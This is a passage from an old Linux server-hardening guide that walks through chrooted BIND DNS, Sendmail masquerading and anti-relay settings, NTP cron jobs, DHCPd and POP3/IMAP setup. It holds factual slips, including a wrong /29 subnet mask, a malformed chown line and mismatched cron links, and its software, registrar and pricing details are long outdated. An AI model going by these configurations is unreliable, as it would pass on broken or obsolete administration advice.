/home/chroot-dns-ext RETVAL=$? [ $RETVAL -eq 0 ] && touch /var/lock/subsys/named-ext stop) # Stop daemons. echo -n "Shutting down named: " killproc named RETVAL=$? [ $RETVAL -eq 0 ] && rm -f /var/lock/subsys/named-int && rm -f /var/lock/subsys/named-ext -- Next, we need now modify how SYSLOG loads up so it understands how to deal with the new DNS servers: Edit /etc/rc.d/init.d/syslog file and change the loading of SYSLOG to the following: -- daemon syslogd -a /home/chroot-dns-int/dev/log -a /home/chroot-dns-ext/dev/log -m 0 -- Now, configure your machine to use the local DNS server: /etc/resolv.conf -- search acme123.com nameserver 127.0.0.1 #Backup - your ISP's DNS servers #nameserver 10.200.200.69 #nameserver 10.200.200.96 -- Next, make sure that your machine is prepped to use DNS: Slackware: /etc/host.conf ---- order hosts, bind multi on ---- Redhat: /etc/nsswitch.conf Change the "hosts" line to read: "hosts: files dns" Also.. I would recommend to DELETE all instances of NIS from each line of this file UNLESS you *ARE* using NIS! * Ok, getting close. Now, make sure that BIND is enabled upon boot. - To do this, UN-DO all edits for DNS lines in [Section 8] Note: the NTSYSV method won't work for this. - Now, test that all the named files are correct by running "named" in a forground test: /home/chroot-dns-int/usr/sbin/named -u chroot-dns-int -g chroot-dns-int -t /home/chroot-dns-int -f The INTERNAL DNS server output should look like: -- Apr 10 01:48:42 project named[27951]: starting. named 8.2.2-P5 Tue Dec 14 20:30:23 CET 1999 ^Iroot@jedi.mandrakesoft.com:/usr/src/RPM/BUILD/bind-8.2.2P5/src/bin/named Apr 10 01:48:42 project named[27951]: hint zone "" (IN) loaded (serial 0) Apr 10 01:48:42 project named[27951]: Zone "192.168.0" (file 192.168.0.db): No default TTL set using SOA minimum instead Apr 10 01:48:42 project named[27951]: master zone "192.168.0" (IN) loaded (serial 2000033100) Apr 10 01:48:42 project named[27951]: Zone "0.168.192.in-addr.arpa" (file 192.168.0-in.addr.db): No default TTL set using SOA minimum instead Apr 10 01:48:42 project named[27951]: master zone "0.168.192.in-addr.arpa" (IN) loaded (serial 1999111300) Apr 10 01:48:42 project named[27951]: listening on [127.0.0.1].53 (lo) Apr 10 01:48:42 project named[27951]: Forwarding source address is [0.0.0.0].1033 Apr 10 01:48:42 project named[27951]: chrooted to /home/chroot-dns-int Apr 10 01:48:42 project named[27951]: group = chroot-dns-int Apr 10 01:48:42 project named[27951]: user = chroot-dns-int Apr 10 01:48:42 project named[27951]: Ready to answer queries. Apr 10 01:48:42 project named[27951]: Zone "192.168.0" (file 192.168.0.db): No default TTL set using SOA minimum instead Apr 10 01:48:42 project named[27951]: Zone "0.168.192.in-addr.arpa" (file 192.168.0-in.addr.db): No default TTL set using SOA minimum instead -- -- Hit Control-C when you are sure that Named is running ok. Now try running the external server: /home/chroot-dns-ext/usr/sbin/named -u chroot-dns-ext -g chroot-dns-ext -t /home/chroot-dns-ext The EXTNERAL DNS server output should look like: -- Apr 10 01:52:10 project named[27960]: starting. named 8.2.2-P5 Tue Dec 14 20:30:23 CET 1999 ^Iroot@jedi.mandrakesoft.com:/usr/src/RPM/BUILD/bind-8.2.2P5/src/bin/named Apr 10 01:52:10 project named[27960]: hint zone "" (IN) loaded (serial 0) Apr 10 01:52:10 project named[27960]: Zone "acme123.com" (file acme123.com.db): No default TTL set using SOA minimum instead Apr 10 01:52:10 project named[27960]: master zone "acme123.com" (IN) loaded (serial 2000033100) Apr 10 01:52:10 project named[27960]: Zone "212.0.200.100.in-addr.arpa" (file 100.200.0.212.db): No default TTL set using SOA minimum instead Apr 10 01:52:10 project named[27960]: master zone "212.0.200.100.db.in-addr.arpa" (IN) loaded (serial 2000033100) Apr 10 01:52:10 project named[27960]: listening on [100.200.0.212].53 (eth0) Apr 10 01:52:10 project named[27960]: Forwarding source address is [0.0.0.0].1033 Apr 10 01:52:10 project named[27961]: chrooted to /home/chroot-dns-ext Apr 10 01:52:10 project named[27961]: group = chroot-dns-ext Apr 10 01:52:10 project named[27961]: user = chroot-dns-ext Apr 10 01:52:10 project named[27961]: Ready to answer queries. Apr 10 01:52:15 project named[27961]: Sent NOTIFY for "acme123.com IN SOA" (trinityos.com); 1 NS, 1 A Apr 10 01:52:21 project named[27961]: Received NOTIFY answer from 216.111.111.216 for "trinityos.com IN SOA" Apr 10 01:52:37 project named[27961]: Sent NOTIFY for "212.0.200.100.in-addr.arpa IN SOA" (212.0.200.100.in-addr.arpa); 4 NS, 4 A Apr 10 01:52:38 project named[27961]: Received NOTIFY answer from 102.200.0.25 for "212.0.200.100.in-addr.arpa IN SOA" -- Hit Control-C when you are sure that Named is running ok. ************************ *** Supporting more than one Internet Domain name: *** *** Having your Linux box do DNS for more that just ONE domain is VERY simple. If you want to do this, all you have to do is: 1) Create and edit another zone file for your new domain (use your primary domain name zone file as a template). ie. /home/chroot-dns-ext/var/named/newdomain.com.db 2) Edit the /home/chroot-dns-ext/etc/named.conf file to: A) allow secondary DNS access to your new 2nd domain's secondary DNS server (if a different secondary than your primary domain secondary server). B) Add the loading of the new /var/named/newdomain.com.db zone file just like you did for the acme123.com zone file. 3) Restart Bind *** Setting up Secondary (BACKUP) DNS servers If you also want to configure a REMOTE DNS server to be a secondary for you *OR* configure your DNS server to be a secondary for them, do the following: A remote box will be your secondary DNS server: - As shown above, you need to: - edit the /etc/rc.d/rc.firewall file and make sure that you have put in the IP address of the slave DNS server in the "secondarydns" enviroment variable. - edit /home/chroot-dns-ext/etc/named.conf file and make sure the "allow-transfer" line has the proper IP address of the slave DNS server - Edit the remote server's /home/chroot-dns-ext/etc/named.conf file and APPEND the following: -- zone "acme123.com." { type slave; file "acme123.com.db"; masters { 100.200.0.212; }; allow-transfer { none; }; }; zone "212.0.200.100.in-addr.arpa." { type slave; file "212.0.200.100.db"; masters { 100.200.0.212; }; allow-transfer { none; }; }; -- **** NOTE: The second section above is for setting up secondary DNS server that only **** has ONE IP ADDRESS. If the server you were secondarying for had a subnet of IPs, you would need a slightly different version. The following example would be correct if the remote system had -8- IP allocated to them. -- zone "128/29.0.200.100.in-addr.arpa." { type slave; file "128.0.200.100.db"; masters { 100.200.0.129; }; allow-transfer { none; }; }; -- Basically, you need to understand that: The IP addresses the remote site was given was 100.200.0.128-135 with a subnet mask of 255.255.255.250 or a /29 Then, with the not-so-obvious DNS syntax from RFC 2317, you read the top line as: - In the last octet of the IP address, the first IP address of this remote subet is "128". (This is the NETWORK address) - Next, the subnet mask is a /29 or 8 IPs - The remaining reverse zone is 0.200.100 Its weird and NOT obvious (try reading the RFC!) but it works fine. - Next, you need to create this new file for this domain. touch /home/chroot-dns-ext/var/named/acme123.com.db - Finally, restart the remote secondary DNS server by running the following command from the remote box: Redhat: /etc/rc.d/init.d/named stop /etc/rc.d/init.d/named start Slackware: kill -HUP `ps aux | grep named | grep -v -e grep | awk '{print $2}'` /usr/sbin/named & Once everything is working fine, be SURE to follow the "aliases" instruction in [Section 18]. Next, I recommend that you implement the following script from the DNS-HOWTO (with a few changes on my behalf): /usr/local/sbin/root-hints-update -- #!/bin/bash # # Update the nameserver cache information file once per month. # This is run automatically by a cron entry. # # v2.0 - Updated the script to support dual zone files # v1.3 - Updated the script to show more verbose FAILURE logs. # Thanks to jon.marks@novatek.co.nz for the ideas # # v1.2 - added the test if no ROOT-SERVERS were returned # v1.1 - added the test if the result had a SERV-FAIL # v1.0 - original script from the DNS-HOWTO export PATH=/sbin:/usr/sbin:/bin:/usr/bin: cd /var/named dig @a.root-servers.net . ns > root.hints.new 2> result DIG_OUTCOME=FAIL if [ `grep -c SERVFAIL root.hints.new ` = 0 ] && [ `grep -c ROOT-SERVERS root.hints.new` -gt 0 ] then DIG_OUTCOME=SUCCESS mv -f /home/chroot-dns-ext/var/named/root.hints.db /home/chroot-dns-ext/var/named/root.hints.db.old cp -f /home/chroot-dns-ext/var/named/root.hints.new /home/chroot-dns-ext/var/named/root.hints.db chown /home/chroot-dns-ext:chroot-dns-ext /home/chroot-dns-ext/var/named/root.hints.db chmod 444 /home/chroot-dns-ext/var/named/root.hints.db cp /home/chroot-dns-ext/var/named/root.hints.db /home/chroot-dns-int/var/named/root.hints.db echo -n "Restarting named: " >> result # note: We dont use restart since old Redhat didn't support it /etc/rc.d/init.d/named stop >> result /etc/rc.d/init.d/named start >> result fi ( echo "To: hostmaster " echo "From: system " echo "Subject: TrinityOS DNS monthly root.hints.db update status: $DIG_OUTCOME." echo cat root.hints.new result echo ) | /usr/sbin/sendmail -t rm -f result root.hints.new exit 0 -- Now, make it executable and readable ONLY by root: chmod 700 /usr/local/sbin/root-hints-update Finally, put it in the cron job to run monthly: Redhat: ln -s /usr/local/sbin/root-hints-update /etc/cron.monthly/root-hints-update Slackware: - Edit "/var/spool/cron/crontab/root" and add this line to the bootom of the file: -- 02 3 1 * * /usr/local/sbin/root-hints-update -- Thats it! ---------------------------------------------------------------------------- How to acqure a Domain name: ---------------------------------------------------------------------------- To get your own Internet domain, you need: 1. A Internet domain name that isn't already taken. You can check to see if your desired domain is available by going to: http://www.internic.net or use the: "whois" command. Also, don't forget to try the other suffixes like .com, .net, and .org. NOTE: US laws are about to change in the Internet. Currently, sleazy Internet users have been reserving domain names like cheezewiz.com and making the rightful owners (kraft) pay ransoms to get them back. In 2000, companies that own trademarks to these names like CheeseWiz will have LEGAL rights to those domains. So, even if you had the domain, superdupergizo.com for years and sold gizmos with that name, someone might get that name trademarked. If that happens, they then will have LEGAL right to take that domain away from you. Because of this, you might also want to get a trademark in addition to the domain name. You might not care too much about this but some people DO. Also note that if I get a trademark for "TrinityOS", I then have legal grounds to kick people off the .net and .org domains though I don't already own them. This will cost more legal fees but I would have legal recourse. Personally, I think it will be cheaper in the long run if you just register ALL three domain name suffixes (.com, .net, .org) ahead of time. 2. (2) or more fully qualified domain host names and their TCP/IP address of your backup DNS servers. You will have to coordinate this setup with the remote DNS administrators but it isn't too hard. (Its fully documented in TrinityOS's DNS section). NOTE: You can RESERVE this domain name and not need any TCP/IP addresses, etc for now. This service costs more (currently $119 for 2 years from NSI) and it won't do anything but put up a generic holder. Note #2: You can pay even more and then NSI or other providers can completely host your site. That includes DNS, Email, WWW, etc. Other companies can offer these services for cheaper prices though Note #3: Realistically these servers shouldn't be on the same network (ISP). For example: if you want to put a DNS server behind your "XYZ" ISP provider, your backup DNS servers shouldn't be connected via "XYZ". Why? What happens if XYZ's network goes down? ALL DNS for your domain will fail. That means email will bounce, etc. --- If you are going to setup your own service, you need: 3. A permanent Internet connection with a static IP. --OR-- You can sign up with some of those dynamic DNS providers and they can then update their tables to you. 4. A credit card (makes things easier but they can also bill you too for bulk requests). Each domain currently costs $70 for 2 years and then $35 per year after that. NOTE: Fortunately, you can usually deduct this cost from your taxes. 5. Now, with all this information (IP addresses, etc), goto http://www.internic.net. In the future, there will be other companies that can do registration for DNS names. Until then, you still must use NSI). 6. Follow the prompts and enter in your domain name(s). Then click on either "reserve" or "register". NOTE: In the past, all DNS registration was done via a email-only system. It was confusing at times and a pain. The new system is ALL web based and is much better. NOTE #2: Do not put in bogus data for any of the fields. They check the info and if it doesn't all check, they will deny you the domain. The need your snail mail address for your receipt and phone numbers in case your DNS server, etc goes down, is hacked into, etc. This phone number is more valuable than you might think. NOTE #3: When filling out the new Contact Information area, you might see the section for security. There are three types: MAIL-FROM: This means that any changes to your domain must come from an email address from your domain and it is the default setting. DO NOT USE THIS OPTION. Its too simple for remote people to forge email. Because of this, many people have had their domains STOLEN from them because of this weak link. CRYPT: This is a password encrypted setup. This is pretty good as long as you use a GOOD password. See [Section 8] in TrinityOS for how to pick good passwords. PGP: This is the ultimate in security and you need to submit your public PGP key to the Internic. BE WARNED: If you change your PGP key often (your need to do this), you might lock yourself out of your domain and you will have to call the Internic direct. If you DO NOT SEE these fields, don't worry. Once you finish your domain registration, go back to: http://www.networksolutions.com/cgi-bin/itts/handle and change it there. 7. When it asks you for a email address, do NOT use an email address that will be behind this new domain. Why? Until you get this DNS system fully running, any email from the Internic will be lost! Get it? But.. don't worry, once everything works fine, you can go back and change this address. 8. After that.. its pretty simple and VERY fast. ---------------------------------------------------------------------------- If you need more info on DNS, follow this great HOWTO: ftp://sunsite.unc.edu/pub/Linux/docs/HOWTO/DNS-HOWTO ================================================================================ Section 25 - SMTP MAIL: Sendmail configuration w/ domain masquerading & spam filters Sendmail is the typical MTA or Mail Transfer Agent for Linux. Though it seems compilicated, it isn't too bad. Just take it a step at a time and you'll do fine. Yes, many of the commands are terse but the included configs are pretty good. If you don't trust my configs, check out Sendmail for more details: http://www.sendmail.org/m4/readme.html ******** ** ** If you aren't sure what version of Sendmail you are running or what features ** were compiled into your version of Sendmail, try this command: ** ** sendmail -d0.1 -- # sendmail.cw - include all aliases for your machine here. acme123.com newdomain.com ---- ** **************************** ----------------------------------------------------------------- All users, regardless of using the RPMs or compiling the source: ----------------------------------------------------------------- - If you were to use Sendmail now, it would be broken since you would send mail from your machine but the receiver will see "ns.yourhost.com" in the reply field and NOT "yourhost.com". To fix this, you need to enable Sendmail's domain masquerading. You can do this the easy way or the harder way: Doing it the Sendmail way (recommended): ---------------------------------------------------------------------- - Sendmail's .cf example files and the .m4 scripting language need to be installed. RPM users: Verify that this package is installed by typing in "rpm -q sendmail-cf" Compiling users: mkdir /usr/lib/sendmail-cf tar cpf - /usr/src/archive/sendmail/sendmail-x.x.x/* | (cd /usr/lib/sendmail-cf; tar xpvf -) - Goto /usr/lib/sendmail-cf/cf Redhat users: NOTE: You may or may NOT have this file Make a backup of your old .mc file cp redhat.mc redhat.mc.old - Create the "trinityos.mc" file. NOTE #1 - you only have to update the lines that have "acme123.com" in it. Leave the rest alone for LINUX systems. *************************************** * This config reflects Sendmail 8.9.x ********** /usr/lib/sendmail-cf/cf/trinityos.mc -- VERSIONID(`@(#)trinityos.mc 8.10 (Berkeley) 11/26/99') OSTYPE(linux) FEATURE(nouucp) FEATURE(local_procmail) MAILER(procmail) MAILER(smtp) MASQUERADE_AS(acme123.com) MASQUERADE_DOMAIN(acme123.com) FEATURE(masquerade_entire_domain) FEATURE(masquerade_envelope) FEATURE(always_add_domain) FEATURE(rbl) FEATURE(use_cw_file) define(`PROCMAIL_MAILER_PATH', `/usr/bin/procmail') define(`confSMTP_LOGIN_MSG',`') define(`confPRIVACY_FLAGS',`authwarnings noexpn novrfy needmailhelo noetrn') -- *************************************** * This config reflects Sendmail 8.8.x ********** NOTE #1: The .mc file synax has CHANGED between Sendmail 8.8.x and 8.9.x. Because of this, use the proper .mc instructions for your version of Sendmail. I *HIGHLY* recommend that you upgrade to the latest 8.9.x to avoid known security and spamming issues. /usr/lib/sendmail-cf/cf/trinityos.mc -- include(`../m4/cf.m4') define(`confDEF_USER_ID',``8:12'') OSTYPE(`linux') undefine(`UUCP_RELAY') undefine(`BITNET_RELAY') MASQUERADE_AS(acme123.com) FEATURE(masquerade_envelope) FEATURE(redirect) FEATURE(always_add_domain) FEATURE(use_cw_file) FEATURE(local_procmail) MAILER(procmail) MAILER(smtp) HACK(check_mail3,`hash -a@JUNK /etc/mail/deny') HACK(use_ip,`/etc/mail/ip_allow') HACK(use_names,`/etc/mail/name_allow') HACK(use_relayto,`/etc/mail/relay_allow') HACK(check_rcpt4) HACK(check_relay3) -- - Now do the following to create a "trinityos.cf" file from the just created "trinityos.mc" file export CFDIR="/usr/lib/sendmail-cf" cd /usr/lib/sendmail-cf m4 ${CFDIR}/m4/cf.m4 ${CFDIR}/cf/trinityos.mc > ${CFDIR}/cf/trinityos.cf cp ${CFDIR}/cf/trinityos.cf /etc/sendmail.cf Doing it the hacker way (NOT recommended unless you know what you are doing: ---------------------------------------------------------------------- - Manudally edit the /etc/sendmail.cf - Near line 164, you will see "DM" by itself. Add your domain to this line. ie DMacme123.com - Near lines 813 and 814, change the terse lines from Sendmail section S94: S94 #R$+ $@ $>93 $1 R$* < @ *LOCAL* > $* $: $1 < @ $j . > $2 to this: S94 R$+ $@ $>93 $1 #R$* < @ *LOCAL* > $* $: $1 < @ $j . > $2 *** *** Next, be SURE to follow the "aliases" instructions in [Section 18]. *** - NOTE: I had some issues with the 8.9.3 installation at this point. Specifically, I was getting the following in /var/log/maillog: -- Aug 24 22:38:45 trinity2 sendmail[7375]: WAA07051: SYSERR(root): Cannot exec /usr/local/bin/procmail: No such file or directory Aug 24 22:38:45 trinity2 sendmail[7368]: WAA07051: to=, delay=00:10:10, xdelay=00:00:00, mailer=local, stat=Operating system error -- This is because sendmail wasn't looking for procmail in the right place. You can either impliment the following hack or fix it the proper way by using the: define(`PROCMAIL_MAILER_PATH', `/usr/bin/procmail') paramter in the 8.9.x. trinityos.mc file To hack it to get things running, I had to fix a path ISSUE: -- ln -s /usr/bin/procmail /usr/local/bin/procmail -- Ok, next, you need to make sure that your mail server is SECURE and RELAY-free: - When hackers want to hack into a given a email server, they will first want to find out what version of the email server you are running. Once they know what version you are running, they can then run exploits against it. Also, they will try to find out where root and postmaster email goes to. So, what can you do? 1. Always run the newest version of your email server. Be it Sendmail, Qmail, PostFix, etc. 2. Hide the name and version of your email server: - Sendmail: Edit the /etc/sendmail.cf file and change the following lines from: -- O SmtpGreetingMessage=$j Sendmail $v/$Z; $b O Privacy Options=authwarnings O HelpFile=/usr/lib/sendmail.hf -- to: -- O SmtpGreetingMessage= O Privacy Options=authwarnings noexpn novrfy needmailhelo noetrn O HelpFile= -- NOTE: The "Privacy Options" changes are now automatically done for you in the new /usr/lib/sendmail-cf/cf/trinityos.mc file A note on Compatiblity : I have had one user that told me that the "needmailhelo" option was possibly causing "SMTP error 250 - remote protocol error" problems with some remote SMTP servers. Please understand that this is NOT a Sendmail problem on your end. This option exposed a broken SMTP on the remote end. You should also keep in mind that Sendmail, to this day, is one of the most tolerant SMTP servers when communicating to broken remote SMTP servers. If you were to move over to a different SMTP server, say Qmail, you would notice a LOT more broken SMTP servers out on the Internet. - Do you need Sendmail to run as a DAEMON: You now need to determine if you need to have sendmail running all the time or just have it occasionally load up to send email. What's the difference? - Sendmail ONLY needs to be always running if you have your own FQDN domain such as acme123.com which you registered with the Internic. If you do have your own domain and want to receive email, make sure to enable Sendmail that was DISABLED in [Section 8] If you DON'T have your own domain, you DO NOT NEED Sendmail to always run. Because of this, I recommend to disable Sendmail as a DAEMON as shown in [Section 8]. If you do disable Sendmail but if you want to SEND email from your Linux box, you still need to have Sendmail (or any other MTA like Qmail, Vmail, PostFix, etc) installed. If you aren't going to have Sendmail running Daemon modem, your locally sent email should be able to get out fine. But, if there is a problem with your Internet connection, the Internet itself, or the remote mail server, when you originally tried to send that mail, it WON'T be automatically be re-scheduled to be sent at a later time. To get Sendmail to retry later, , you need to configure "cron" to try to resend any queued email once an hour. To have sendmail try sending delayed email: Redhat: Create the /etc/cron.hourly/sendmail file -- /usr/sbin/sendmail -q -- Slackware: edit the /var/spool/cron/crontabs/root file and add a line: -- 01 * * * * /usr/sbin/sendmail -q -- Now, re-load cron to see the changes: kill -HUP `ps aux | grep crond | grep -v -e grep | awk '{print $2}'` Thats it! Now you need to test Sendmail: 1. First, start it up: Redhat: /etc/rc.d/init.d/sendmail restart Slackware: /usr/sbin/sendmail -bd -q1h 2. If you are running your own domain: 2.A. Send an email to root@acme123.com from a remote computer out on the Internet. Make sure that this test mail arrives to your INBOX. 2.B. Look at the headers and make sure that the TO: field looks ok. 3. Regardless if you DO or DON'T have your own Internet domain name: 3.A. Send email from the local Linux box to a different user on the local Linux box (via Pine, ELM, etc). Make sure it gets there. 3.B. Send email from the local Linux box to the "root" account. Make sure that this email is properly forwarded to the user configured to receive "root's" email via [Section 18] 4. For users that send email via a POP3/IMAP client (Eudora, Netscape, etc) from an INTERNAL LAN. 4.A. Be sure to configure your POP3/IMAP client properly. 4.B. Send a peice of email to a remote account that you have access to or that someone can then forward BACK to you. 4.C. -LOOK- at the techincal email headers. Some programs make you push some buttons to look at this information. Eudora needs the "BlahBlah" button pushed. Pine requires that you hit "O" for Options and then "H" for Header Mode (note: these PINE options must be ENABLED in Pine's configuration menus to even see them). 4.D. Make sure that none of the To, From: Reply, etc addresses look odd. 5. For users that send email from a POP3/IMAP client (Eudora, Netscape, etc) via the Internet (you are dialed into some other ISP, etc) 5.A. Be sure to configure your POP3/IMAP client and Linux POP/IMAP server properly. 5.B. Be sure that you can receive email via POP/IMAP from your Linux server. *** 5.C. Send a peice of email to a remote account via the local mail tools like Pine, elm, etc. Can you do it? Probably not!! The reason for this is because you are trying to to EMAIL RELAY through your Linux server and this is BAD. This is how you get a majority of all that SPAM email. To fix this, add ANY remote network names, either INTERNAL or EXTERNAL, that you want to send email FROM into the /etc/mail/relay-domains file. For example, say I'm dialed into an ISP, say earthlink.net, and I want to send email via my Linux server. Also, I will want to send email from ANY machine on the internal MASQ'ed network. For this to work, I would have to do the following: --/etc/mail/relay-domains earthlink.net 192.168.0 -- NOTE #1: I hope you realize that by doing line #1, any OTHER users that use Earthlink.net can ALSO use your Linux server as a relay site. This is BAD but you might not have any choice. Your only other (but preferred) choice is to get a STATIC IP address from your ISP (ie. Earthlink) and then configure in THAT specific name or TCP/IP address. NOTE #2: For the second line, you can also add either the generic network IP address, a specific internal machine's IP address, your top level FQDN, (acme123.com), or the FQDN of each internal machine. Your pick. Thats it. Everything SHOULD work ok for you. ================================================================================ Section 26 - NTP Time calibration * Some of you might be wondering why I'm not using XNTP or something like that. Why? Getdate is 37k with ALL the sources and compiled binaries. Ntp-4.0.72i is over 8.8MB! For fricken just time calibration! Yes, Xntp does a LOT more than getdate but for the purposes we need here, it is MASSIVE overkill. But, many distributions come with it built-in so I will support it now. I've been also told that newer versions of Slackware comes with "netdate" which is supposed to be just as good as "getdate". Since this only exists on Slackware, I'll stick with getdate and xntp for now. IMPORTANT: It is good etiquette to email the NTP clock manager and confirm that its ok to sync off their clock server. These servers get POUNDed and many NTP managers will ban you from syncing to them unless you ask. Don't ask me why they get so uptight but some just do. -- - Download "xntpd" or "getdate" (URLs in [Section 5] and put it in /usr/src/archive - Getdate - Uncompressit via "tar -xzvf - Edit the Makefile - Change the "PREFIX" to be /usr/local - Run "make", "make install", "make installman" - Now, goto http://www.eecis.udel.edu/~mills/ntp/clock1.html and pick a NTP server to connect to. Test that it is up by running "getdate your.ntp.site". [root@roadrunner /root]# getdate ntp.nasa.gov ntp.nasa.gov: (-68) Sun Jun 14 10:27:28 1998 * There are TWO examples here: once and hour and every 15 minutes. I recommend the once-an-hour method. The 15 minute method is for users running Diald. This NTP traffic will bring up the link every 15 minutes. - The Getdate way: ------------------ - Edit the /usr/local/sbin/getdate file and make it look like so: For example, this is what I use. Edit to use servers local to you /usr/local/sbin/get-date -- #!/bin/sh # # The "clock" command sets the CMOS clock time as well. # timehosts="otc2.psu.edu wwvb.erg.sri.com ntp.nasa.gov" # if /usr/local/bin/getdate -adjust 10 200 $timehosts > /dev/null; then /sbin/clock --systohc fi -- - The xntp way: --------------- - Edit the /usr/local/sbin/set-clock file and make it look like so: For example, this is what I use. Edit to use servers local to you /usr/local/sbin/set-clock -- #!/bin/sh # # The "clock" command sets the CMOS clock time as well. # timehosts="otc2.psu.edu wwvb.erg.sri.com ntp.nasa.gov" # if /usr/sbin/ntpdate -ub $timehosts > /dev/null; then /sbin/hwclock --systohc fi -- - Slackware users: - Edit "/var/spool/cron/crontab/root" and add this line to the bootom of the file: - 60 minutes with "xntp" * 0-23 * * * /usr/local/sbin/set-clock - 60 minutes with "getdate" * 0-23 * * * /usr/local/sbin/get-date - 15 minutes with "xntp" 0,15,30,45 * * * * /usr/local/sbin/set-clock - 60 minutes with "getdate" 0,15,30,45 * * * * /usr/local/sbin/get-date - Lastly, tell CRON to re-read it's configuration file by running: kill -HUP `ps aux | grep crond | grep -v -e grep | awk '{print $2}'` - Redhat users - 15 minutes - Edit the /etc/crontab file and ADD this line ABOVE the cron.hourly line. 0,15,30,45 * * * * root run-parts /etc/cron.15min - Link the script ln -s /usr/local/sbin/get-date /etc/cron.hourly/get-date - Tell CRON to re-read it's configuration file by running: kill -HUP `ps aux | grep crond | grep -v -e grep | awk '{print $2}'` - 60 minutes - This hourlt cron direcory is already setup in Redhat - Link the script - 60 minutes the "xntp" way ln -s /usr/local/sbin/get-date /etc/cron.hourly/set-clock - 60 minutes the "getdate" way ln -s /usr/local/sbin/get-date /etc/cron.hourly/get-date - 15 minutes the "xntp" way ln -s /usr/local/sbin/get-date /etc/cron.15min/set-clock - 15 minutes the "getdate" way ln -s /usr/local/sbin/get-date /etc/cron.15min/get-date ================================================================================ Section 27 - DHCPd SERVER configuration DHCP or Dynamic Host Control Protocol is the the direct cousin of BOOTP. Please see the DHCP RFCs in [Section 5] for more details. -- BOOTP: Bootp is usually used to give network equipment an IP address (usually static) and it also is used to initiate TFTP (trival file transfer protocol) file transfers to give this network equipment its operating system and possibly its configuration as well. DHCP: This newer protocol is more intended for computers on a given LAN for things like: - Host name and FQDN - IP address, mask and default gateway - DNS servers - WINS servers (optional) - etc. The Internet peoples at be realized the BOOTP was fairly inflexible and wouldn't grow with new features. So DHCP is a flexible protocol that, much like PPP, has negotiated parameters, that can send out everything from IP addresses to NTP servers. DHCP is a great system to be able to just plug a DHCP-compatible computer and DHCP will configure its whole network system on the FLY. DHCP is very flexible. You can give it pools of dynamic IPs to give out, statically give certain machines STATIC IPs (like below), etc. -- NOTE: This config defines a STATIC IP address per core machine. All other machines get dynamic DHCP IP addresses. I do this for security reasons. To find out the MAC address of a machine's ethernet card, do the following: Win95: run "winipcfg" WinNT: run "ipconfig /all" Linux: run "arp" - Redhat: - Make sure that the /etc/rc.d/rc3.d/S65dhcpd exists If not, enable it as defined in [Section 8] - Edit the file /etc/rc.d/init.d/dhcpd and change the following. NOTE: This configuration assumes you want to serve DHCP leases ONLY on the "eth1" interface Start section line from: -- daemon dhcpd -- to -- route add -host 255.255.255.255 eth1 daemon dhcpd eth1 -- NOTE: you need to change the "interface" name to whatever INTERNAL LAN interface you want DHCP to run on. Ie. You DON'T want DHCP to run on your Internet connection!! - Slackware: Add the following line to the /etc/rc.d/rc.inet1 file: route add -host 255.255.255.255 eth1 Add a line to execute dhcpd in the /etc/rc.d/rc.local file like: /usr/sbin/dhcpd eth1 - For ALL distrobutions, create and modify the file /etc/dhcpd.conf /etc/dhcpd.conf ---- server-identifier roadrunner-int.acme123.com; option subnet-mask 255.255.255.0; option broadcast-address 192.168.0.255; option routers 192.168.0.1; option domain-name-servers 192.168.0.1, 24.1.64.33, 24.1.64.34; option domain-name "acme123.com"; default-lease-time 86400; subnet 192.168.0.0 netmask 255.255.255.0 { range 192.168.0.9 192.168.0.10; } host coyote.acme123.com { hardware ethernet 00:60:08:B1:36:4A; fixed-address 192.168.0.4; option host-name coyote; } ---- Next, you need to create the dhcp.leases file: "touch /etc/dhcpd.leases" As mentioned above, you will need to replace the hardware ethernet MAC addresses with the MAC addresses of your specific NIC cards. * Ok, now you need to put in all of your DHCP IP addresses into DNS as described in [Section 24] and then restart Bind. Now, you need to make sure you have the following lines in your /etc/services file: -- bootps 67/udp # bootp server bootpc 68/udp # bootp client -- Finally, lets start DHCP up: Slackware: Run "/usr/sbin/dhcpd eth1" Redhat: Run "/etc/rc.d/init.d/dhcpd start" * Additional security: DHCPd runs as root in a non-chroot'ed way. If you are paranoid about security, check out the LASG doc. The URL is in [Section 5] If that works well, you should enable DHCP full time: Redhat: chkconfig --level 2345 dhcpd on ================================================================================ ================================================================================ Section 28 - POP3 and IMAP4 e-mail serivces First, a quick description of the various email client protocols: -- UUCP: UUCP or UNIX-to-UNIX-COPY is the oldest email system out there and I doubt many use people anymore. Before the days of SMTP, it was the only game in town and VERY complicated. POP3: POP3 or Post Office Protocol 3 is the older method get email but its still in use today. The issue with POP3 mail is that users authenticate to it in CLEAR TEXT. This is a bad thing. Fortunately, there are security add-ons to encrypt this username/password such as APOP, MD5, and even Kerberos. Anothering thing to be aware about POP3 email is that the client will actually download ALL the email from the server and mark all the email on the server as READ. One NICE thing about this is that you can download your email, go offline, read and reply to your email as you wish. When you are ready to send off your replies, just reconnect to the Internet and send off your email. But, even if you don't read all the email on the client and then go back to a different email program like the server-based email programs like Pine or Elm, you won't know which emails were and weren't read. Trust me, this is a pain in the butt. In Linux, POP3 clients are supported by the in.pop3d daemon and is super simple to install and run. It just loads from /etc/inetd.conf and uses the /etc/passwd or /etc/shadow files to authenticate people. IMAP4: IMAP4 or Internet Message Access Protocol 4 is the newest email system. Its default method to authenticate users is encrypted BUT you can also add on additional security like have all traffic MD5 encrypted, etc. Unlike POP3, IMAP4 email clients typically need to be ON-LINE the whole time since you don't download ALL your email at once. The excellent thing about IMAP is that is maintains what emails have been read / not read. So, regardless of the email client you use, you can always read your email easily. Like I mentioned before, IMAP typically requires the users to be online to read email. I understand that some IMAP4 clients *CAN* download email to be read offline and then re-attach to the mail server and send email and resyncronize what messages have been read/not read. Unfortunately, I don't know of any UNIX clients that can do this. If you know of some, PLEASE LET ME KNOW! In Linux, IMAP4 clients are supported by the in.imapd daemon and is super simple to install and run. It just loads from /etc/inetd.conf and uses the /etc/passwd or /etc/shadow files to authenticate people. -- First, you need to make sure have configured your IPFWADM or IPCHAINS rulesets correctly to allow POP3/IMAP4 traffic and have enabled "in.pop3d" or "in.imapd" in the /etc/inetd.conf file, Ie, un-# the "pop3d" or "imapd" line in the /etc/inetd.conf file and then run: kill -HUP `ps aux | grep inetd | grep -v -e grep | awk '{print $2}'` After that, either/both POP3 and IMAP4 email should work right out of the box. ----- NOTE: When you check your POP-3 email from somewhere on the Internet, your ----- username/password are sent in clear text. The same also goes for any other network protocol like TELNET, FTP, etc. What this means to you is that if someone between your local machines and your POP-3 server is sniffing packets, they will not only be able get your username/password but also get all of your transmitted email too! Now you might be thinking this is paranoid thinking but securing your connections isn't hard and it is better safe than sorry. So, what can you do to 